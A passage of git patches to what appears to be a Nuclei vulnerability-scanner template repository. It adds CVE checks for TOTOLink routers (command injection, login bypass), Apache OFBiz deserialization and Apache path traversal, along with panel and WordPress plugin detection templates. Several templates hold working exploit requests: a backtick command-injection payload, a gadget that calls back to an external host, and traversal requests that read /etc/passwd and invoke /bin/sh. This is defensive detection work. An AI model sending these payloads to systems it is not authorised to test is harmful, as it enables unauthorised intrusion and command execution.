critical + description: | + TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-25082 + - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25082 + cwe-id: CWE-77 + tags: totolink,cve,cve2022,router,unauth,rce + +requests: + - raw: + - | + GET /cgi-bin/downloadFlile.cgi?payload=`ls>../{{randstr}}` HTTP/1.1 + Host: {{Hostname}} + + - | + GET /{{randstr}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ".sh" + - ".cgi" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/11/05 From 3099b71fdacbae9757a0d49f16a779c3f4734663 Mon Sep 17 00:00:00 2001 From: For3stCo1d <57119052+For3stCo1d@users.noreply.github.com> Date: Sat, 5 Nov 2022 23:08:43 +0800 Subject: [PATCH 0028/1133] Create CVE-2021-30128.yaml --- cves/2021/CVE-2021-30128.yaml | 51 +++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 cves/2021/CVE-2021-30128.yaml diff --git a/cves/2021/CVE-2021-30128.yaml b/cves/2021/CVE-2021-30128.yaml new file mode 100644 index 0000000000..85c78a51a5 --- /dev/null +++ b/cves/2021/CVE-2021-30128.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-30128 + +info: + name: Apache OFBiz <17.12.07 - Arbitrary Code Execution + author: For3stCo1d + severity: critical + description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 + - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E + metadata: + shodan-query: OFBiz.Visitor= + fofa-query: app="Apache_OFBiz" + tags: cve,cve2021,apache,ofbiz,deserialization,rce + +requests: + - raw: + - | + POST /webtools/control/SOAPService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + + + + + + {{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}} + + + + + + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "dns" + + - type: word + part: body + words: + - "errorMessage" From 656c3b1179d3926ca4a308bf044a57dcd3c79c47 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 6 Nov 2022 16:01:25 +0900 Subject: [PATCH 0029/1133] Create CVE-2021-42887.yaml In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-42887.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-42887.yaml diff --git a/cves/2021/CVE-2021-42887.yaml b/cves/2021/CVE-2021-42887.yaml new file mode 100644 index 0000000000..5ec841b5e3 --- /dev/null +++ b/cves/2021/CVE-2021-42887.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-42887 + +info: + name: TOTOLINK - Authentication Bypass + author: gy741 + severity: critical + description: | + In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm. + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-42887 + - https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 9.8 + cve-id: CVE-2021-42887 + cwe-id: CWE-287 + tags: totolink,auth-bypass,cve,cve2021,router + +requests: + - raw: + - | + GET /formLoginAuth.htm?authCode=1&action=login HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: SESSION_ID=" + part: header + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/11/06 From 4fd4f5e673709e98fc5341f2b3c23ed9fcfc891d Mon Sep 17 00:00:00 2001 From: sinKettu Date: Thu, 17 Nov 2022 13:04:54 +0300 Subject: [PATCH 0030/1133] Tomcat Manager Exposed Panel: more flexible and accurate template --- default-logins/apache/tomcat-default-login.yaml | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 96a98e2ffa..de6baeacdb 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -2,7 +2,7 @@ id: tomcat-default-login info: name: Apache Tomcat Manager Default Login - author: pdteam + author: pdteam,sinKettu severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: @@ -68,9 +68,21 @@ requests: words: - "Apache Tomcat" - "Server Information" - - "Hostname" condition: and + - type: word + part: body + condition: or + words: + - "Tomcat Version" + - "JVM Version" + - "JVM Vendor" + - "OS Name" + - "OS Version" + - "OS Architecture" + - "Hostname" + - "IP Address" + - type: status status: - 200 From 379fdba0887f3e060ffbc0c3ea4db4a0966836b5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 19 Nov 2022 22:04:20 +0000 Subject: [PATCH 0031/1133] Auto Generated CVE annotations [Sat Nov 19 22:04:20 UTC 2022] :robot: --- cves/2022/CVE-2022-40881.yaml | 5 ++++- cves/2022/CVE-2022-41840.yaml | 1 + 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40881.yaml b/cves/2022/CVE-2022-40881.yaml index ed0b04a00b..71ca0ccec7 100644 --- a/cves/2022/CVE-2022-40881.yaml +++ b/cves/2022/CVE-2022-40881.yaml @@ -11,10 +11,13 @@ info: - https://github.com/advisories/GHSA-wx3r-88rg-whxq - https://nvd.nist.gov/vuln/detail/CVE-2022-40881 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-40881 + cwe-id: CWE-77 metadata: - verified: true shodan-query: http.favicon.hash:"-244067125" + verified: "true" tags: cve,cve2022,solarview,rce,lfi variables: diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index 61622e6816..b636400b80 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -10,6 +10,7 @@ info: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 + - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve classification: cve-id: CVE-2022-41840 metadata: From d1ab31b1aabaefe43f1e9b9e4c90ea65eb7f0881 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 25 Nov 2022 15:17:28 +0530 Subject: [PATCH 0032/1133] Update zte-panel.yaml --- exposed-panels/zte-panel.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposed-panels/zte-panel.yaml b/exposed-panels/zte-panel.yaml index 7447d58cfd..5e82c398ee 100644 --- a/exposed-panels/zte-panel.yaml +++ b/exposed-panels/zte-panel.yaml @@ -18,7 +18,6 @@ requests: path: - "{{BaseURL}}" - stop-at-first-match: true matchers: - type: word part: body @@ -38,4 +37,3 @@ requests: group: 1 regex: - '
(.+)<\/font><\/div>' - - '(.+)<\/title>' From 5c71d7118623481256b73986e3aa73695c43bd7f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 15:27:14 +0530 Subject: [PATCH 0033/1133] Update mikrotik-routeros.yaml --- exposed-panels/mikrotik-routeros.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik-routeros.yaml index c3456886c0..b362f93364 100644 --- a/exposed-panels/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik-routeros.yaml @@ -2,10 +2,12 @@ id: mikrotik-routeros info: name: MikroTik RouterOS Login - author: gy741, its0x08 + author: gy741,its0x08 severity: info reference: - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe + metadata: + verified: true tags: panel,login requests: From abe3c6f4c91353b052a238b5298b91c2fc427182 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 15:39:38 +0530 Subject: [PATCH 0034/1133] Update mikrotik-routeros.yaml --- exposed-panels/mikrotik-routeros.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik-routeros.yaml index b362f93364..51253f69dc 100644 --- a/exposed-panels/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik-routeros.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe - metadata: + metadata: verified: true tags: panel,login From 9b1335a5785557e2a1a649cf9647cc8c86e88bd2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 15:49:49 +0530 Subject: [PATCH 0035/1133] Update hikvision-panel.yaml --- exposed-panels/hikvision-panel.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposed-panels/hikvision-panel.yaml b/exposed-panels/hikvision-panel.yaml index ffa8821b1a..0532aef035 100644 --- a/exposed-panels/hikvision-panel.yaml +++ b/exposed-panels/hikvision-panel.yaml @@ -2,8 +2,11 @@ id: hikvision-panel info: name: Hikvision panel - author: pdteam, its0x08 + author: pdteam,its0x08 severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:999357577 tags: tech,hikvision requests: From 3d95181705008e7b42c67a17a54eaee008a25cd2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 15:51:09 +0530 Subject: [PATCH 0036/1133] Update and rename hikvision-panel.yaml to hikvision-detect.yaml --- exposed-panels/{hikvision-panel.yaml => hikvision-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{hikvision-panel.yaml => hikvision-detect.yaml} (97%) diff --git a/exposed-panels/hikvision-panel.yaml b/exposed-panels/hikvision-detect.yaml similarity index 97% rename from exposed-panels/hikvision-panel.yaml rename to exposed-panels/hikvision-detect.yaml index 0532aef035..93cf0546b0 100644 --- a/exposed-panels/hikvision-panel.yaml +++ b/exposed-panels/hikvision-detect.yaml @@ -1,4 +1,4 @@ -id: hikvision-panel +id: hikvision-detect info: name: Hikvision panel From 7fcb5e8fc1009bd50832f7d98b1ad34299df4055 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 25 Nov 2022 15:51:57 +0530 Subject: [PATCH 0037/1133] Rename exposed-panels/hikvision-detect.yaml to technologies/hikvision-detect.yaml --- {exposed-panels => technologies}/hikvision-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {exposed-panels => technologies}/hikvision-detect.yaml (100%) diff --git a/exposed-panels/hikvision-detect.yaml b/technologies/hikvision-detect.yaml similarity index 100% rename from exposed-panels/hikvision-detect.yaml rename to technologies/hikvision-detect.yaml From a19df4d0c299e5c115674f78cb0550a500a50b12 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 25 Nov 2022 16:31:05 +0530 Subject: [PATCH 0038/1133] Update hikvision-detect.yaml --- technologies/hikvision-detect.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/technologies/hikvision-detect.yaml b/technologies/hikvision-detect.yaml index 93cf0546b0..19b7be8eff 100644 --- a/technologies/hikvision-detect.yaml +++ b/technologies/hikvision-detect.yaml @@ -1,7 +1,7 @@ id: hikvision-detect info: - name: Hikvision panel + name: Hikvision Panel author: pdteam,its0x08 severity: info metadata: @@ -12,11 +12,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}" - "{{BaseURL}}/favicon.ico" - "{{BaseURL}}/doc/page/login.asp" - - "{{BaseURL}}/doc/script/common.js" - - "{{BaseURL}}/doc/xml/Languages.xml" stop-at-first-match: true matchers-condition: or @@ -25,7 +22,6 @@ requests: part: body words: - "Hikvision Digital Technology" - - '<?xml version="1.0" encoding="utf-8"?>' - type: word name: server From 48524b41d128c390c523365686829dcfc33bd9e9 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Mon, 28 Nov 2022 17:47:11 -0500 Subject: [PATCH 0039/1133] Create webdav-exposed.yaml --- misconfiguration/webdav-exposed.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 misconfiguration/webdav-exposed.yaml diff --git a/misconfiguration/webdav-exposed.yaml b/misconfiguration/webdav-exposed.yaml new file mode 100644 index 0000000000..5cdb22c23c --- /dev/null +++ b/misconfiguration/webdav-exposed.yaml @@ -0,0 +1,24 @@ +id: webdav-exposed + +info: + name: Web Dav Exposed + author: tess + description: WebDAV is an extension to the HTTP protocol. It allows authorized users to remotely add and change content on your web server. + severity: low + tags: webdav,misconfig,exposure + +requests: + - raw: + - | + OPTIONS / HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YW5vbnltb3VzOmFub255bW91cw== + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 + Accept-Encoding: gzip,deflate,br + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 + + matchers: + - type: word + part: header + words: + - "Ms-Author-Via: DAV" From 455fa5a56fffb7697740160c103fde3d244eb699 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Mon, 28 Nov 2022 17:50:57 -0500 Subject: [PATCH 0040/1133] Update webdav-exposed.yaml --- misconfiguration/webdav-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/webdav-exposed.yaml b/misconfiguration/webdav-exposed.yaml index 5cdb22c23c..7ca1715974 100644 --- a/misconfiguration/webdav-exposed.yaml +++ b/misconfiguration/webdav-exposed.yaml @@ -3,7 +3,7 @@ id: webdav-exposed info: name: Web Dav Exposed author: tess - description: WebDAV is an extension to the HTTP protocol. It allows authorized users to remotely add and change content on your web server. + description: WebDAV is an extension to the HTTP protocol. It allows authorized users to remotely add and change content on the web server. severity: low tags: webdav,misconfig,exposure From 5978dc73a44e87b2f785bd8b83f46966fd8652a1 Mon Sep 17 00:00:00 2001 From: y0no <y0no+github@y0no.fr> Date: Wed, 30 Nov 2022 14:59:46 +0100 Subject: [PATCH 0041/1133] Update CVE-2021-41773.yaml Improve CVE-2021-41773 detection --- cves/2021/CVE-2021-41773.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 2786956c21..3dc305a56e 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -32,6 +32,10 @@ requests: GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: {{Hostname}} + - | + GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + - | POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: {{Hostname}} From f867b263c935991d1e7a307eeca976dcdaadefc0 Mon Sep 17 00:00:00 2001 From: Ricardo Maia <rsmaia@gmail.com> Date: Thu, 1 Dec 2022 20:29:57 -0300 Subject: [PATCH 0042/1133] TOP 200 WordPress Plugins --- .../wordpress/wordpress-ad-inserter.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-add-to-any.yaml | 35 +++++++++++++++++++ .../wordpress-admin-menu-editor.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-adminimize.yaml | 35 +++++++++++++++++++ .../wordpress-advanced-custom-fields.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-akismet.yaml | 35 +++++++++++++++++++ ...ordpress-all-404-redirect-to-homepage.yaml | 35 +++++++++++++++++++ .../wordpress-all-in-one-seo-pack.yaml | 35 +++++++++++++++++++ .../wordpress-all-in-one-wp-migration.yaml | 35 +++++++++++++++++++ ...s-all-in-one-wp-security-and-firewall.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-amp.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-antispam-bee.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-astra-sites.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-astra-widgets.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-autoptimize.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-backwpup.yaml | 35 +++++++++++++++++++ .../wordpress-better-search-replace.yaml | 35 +++++++++++++++++++ .../wordpress-better-wp-security.yaml | 35 +++++++++++++++++++ ...wordpress-black-studio-tinymce-widget.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-breadcrumb-navxt.yaml | 35 +++++++++++++++++++ .../wordpress-broken-link-checker.yaml | 35 +++++++++++++++++++ .../wordpress-child-theme-configurator.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-classic-editor.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-classic-widgets.yaml | 35 +++++++++++++++++++ .../wordpress-click-to-chat-for-whatsapp.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-cloudflare.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-cmb2.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-coblocks.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-code-snippets.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-coming-soon.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-complianz-gdpr.yaml | 35 +++++++++++++++++++ .../wordpress-contact-form-7-honeypot.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-contact-form-7.yaml | 35 +++++++++++++++++++ .../wordpress-contact-form-cfdb7.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-cookie-law-info.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-cookie-notice.yaml | 35 +++++++++++++++++++ .../wordpress-creame-whatsapp-me.yaml | 35 +++++++++++++++++++ ...ess-creative-mail-by-constant-contact.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-custom-css-js.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-custom-fonts.yaml | 35 +++++++++++++++++++ .../wordpress-custom-post-type-ui.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-disable-comments.yaml | 35 +++++++++++++++++++ .../wordpress-disable-gutenberg.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-duplicate-page.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-duplicate-post.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-duplicator.yaml | 35 +++++++++++++++++++ ...press-duracelltomi-google-tag-manager.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-easy-fancybox.yaml | 35 +++++++++++++++++++ .../wordpress-easy-google-fonts.yaml | 35 +++++++++++++++++++ .../wordpress-easy-table-of-contents.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-easy-wp-smtp.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-elementor.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-elementskit-lite.yaml | 35 +++++++++++++++++++ .../wordpress-enable-media-replace.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-envato-elements.yaml | 35 +++++++++++++++++++ ...s-essential-addons-for-elementor-lite.yaml | 35 +++++++++++++++++++ .../wordpress-ewww-image-optimizer.yaml | 35 +++++++++++++++++++ .../wordpress-facebook-for-woocommerce.yaml | 35 +++++++++++++++++++ ...press-favicon-by-realfavicongenerator.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-flamingo.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-fluentform.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-font-awesome.yaml | 35 +++++++++++++++++++ ...wordpress-force-regenerate-thumbnails.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-formidable.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-forminator.yaml | 35 +++++++++++++++++++ .../wordpress-ga-google-analytics.yaml | 35 +++++++++++++++++++ ...ess-google-analytics-dashboard-for-wp.yaml | 35 +++++++++++++++++++ ...dpress-google-analytics-for-wordpress.yaml | 35 +++++++++++++++++++ .../wordpress-google-listings-and-ads.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-google-site-kit.yaml | 35 +++++++++++++++++++ .../wordpress-google-sitemap-generator.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-gtranslate.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-gutenberg.yaml | 35 +++++++++++++++++++ .../wordpress-happy-elementor-addons.yaml | 35 +++++++++++++++++++ .../wordpress-header-and-footer-scripts.yaml | 35 +++++++++++++++++++ .../wordpress-header-footer-code-manager.yaml | 35 +++++++++++++++++++ .../wordpress-header-footer-elementor.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-header-footer.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-health-check.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-hello-dolly.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-imagify.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-imsanity.yaml | 35 +++++++++++++++++++ .../wordpress-insert-headers-and-footers.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-instagram-feed.yaml | 35 +++++++++++++++++++ ...wordpress-intuitive-custom-post-order.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-iwp-client.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-jetpack.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-kadence-blocks.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-kirki.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-leadin.yaml | 35 +++++++++++++++++++ ...rdpress-limit-login-attempts-reloaded.yaml | 35 +++++++++++++++++++ .../wordpress-limit-login-attempts.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-litespeed-cache.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-loco-translate.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-loginizer.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-loginpress.yaml | 35 +++++++++++++++++++ .../wordpress-mailchimp-for-woocommerce.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-mailchimp-for-wp.yaml | 34 ++++++++++++++++++ .../wordpress/wordpress-mailpoet.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-maintenance.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-mainwp-child.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-malcare-security.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-megamenu.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-members.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-meta-box.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-ml-slider.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-newsletter.yaml | 35 +++++++++++++++++++ .../wordpress-nextend-facebook-connect.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-nextgen-gallery.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-ninja-forms.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-ocean-extra.yaml | 35 +++++++++++++++++++ .../wordpress-official-facebook-pixel.yaml | 35 +++++++++++++++++++ .../wordpress-one-click-demo-import.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-optinmonster.yaml | 35 +++++++++++++++++++ .../wordpress-password-protected.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-pdf-embedder.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-photo-gallery.yaml | 35 +++++++++++++++++++ .../wordpress-php-compatibility-checker.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-pixelyoursite.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-polylang.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-popup-builder.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-popup-maker.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-post-duplicator.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-post-smtp.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-post-types-order.yaml | 35 +++++++++++++++++++ ...ordpress-premium-addons-for-elementor.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-pretty-link.yaml | 35 +++++++++++++++++++ .../wordpress-really-simple-captcha.yaml | 35 +++++++++++++++++++ .../wordpress-really-simple-ssl.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-redirection.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-redux-framework.yaml | 35 +++++++++++++++++++ .../wordpress-regenerate-thumbnails.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-safe-svg.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-seo-by-rank-math.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-sg-cachepress.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-sg-security.yaml | 35 +++++++++++++++++++ .../wordpress-shortcodes-ultimate.yaml | 35 +++++++++++++++++++ .../wordpress-shortpixel-image-optimiser.yaml | 35 +++++++++++++++++++ .../wordpress-simple-custom-post-order.yaml | 35 +++++++++++++++++++ .../wordpress-simple-page-ordering.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-siteguard.yaml | 35 +++++++++++++++++++ .../wordpress-siteorigin-panels.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-smart-slider-3.yaml | 35 +++++++++++++++++++ .../wordpress-so-widgets-bundle.yaml | 35 +++++++++++++++++++ .../wordpress-ssl-insecure-content-fixer.yaml | 35 +++++++++++++++++++ ...s-stops-core-theme-and-plugin-updates.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-sucuri-scanner.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-svg-support.yaml | 35 +++++++++++++++++++ .../wordpress-table-of-contents-plus.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-tablepress.yaml | 35 +++++++++++++++++++ .../wordpress-taxonomy-terms-order.yaml | 35 +++++++++++++++++++ .../wordpress-the-events-calendar.yaml | 35 +++++++++++++++++++ .../wordpress-themeisle-companion.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-tinymce-advanced.yaml | 35 +++++++++++++++++++ ...wordpress-translatepress-multilingual.yaml | 35 +++++++++++++++++++ ...rdpress-ultimate-addons-for-gutenberg.yaml | 35 +++++++++++++++++++ .../wordpress-under-construction-page.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-unyson.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-updraftplus.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-use-any-font.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-user-role-editor.yaml | 35 +++++++++++++++++++ .../wordpress-velvet-blues-update-urls.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-w3-total-cache.yaml | 35 +++++++++++++++++++ .../wordpress-widget-importer-exporter.yaml | 35 +++++++++++++++++++ ...rdpress-woo-cart-abandonment-recovery.yaml | 35 +++++++++++++++++++ ...rdpress-woo-checkout-field-editor-pro.yaml | 35 +++++++++++++++++++ .../wordpress-woo-variation-swatches.yaml | 35 +++++++++++++++++++ ...merce-gateway-paypal-express-checkout.yaml | 35 +++++++++++++++++++ .../wordpress-woocommerce-gateway-stripe.yaml | 35 +++++++++++++++++++ .../wordpress-woocommerce-payments.yaml | 35 +++++++++++++++++++ ...wordpress-woocommerce-paypal-payments.yaml | 35 +++++++++++++++++++ ...oocommerce-pdf-invoices-packing-slips.yaml | 35 +++++++++++++++++++ .../wordpress-woocommerce-services.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-woocommerce.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-woosidebars.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wordfence.yaml | 35 +++++++++++++++++++ .../wordpress-wordpress-importer.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wordpress-seo.yaml | 35 +++++++++++++++++++ technologies/wordpress/wordpress-worker.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-fastest-cache.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-file-manager.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-google-maps.yaml | 35 +++++++++++++++++++ .../wordpress/wordpress-wp-mail-smtp.yaml | 35 +++++++++++++++++++ .../wordpress-wp-maintenance-mode.yaml | 35 +++++++++++++++++++ 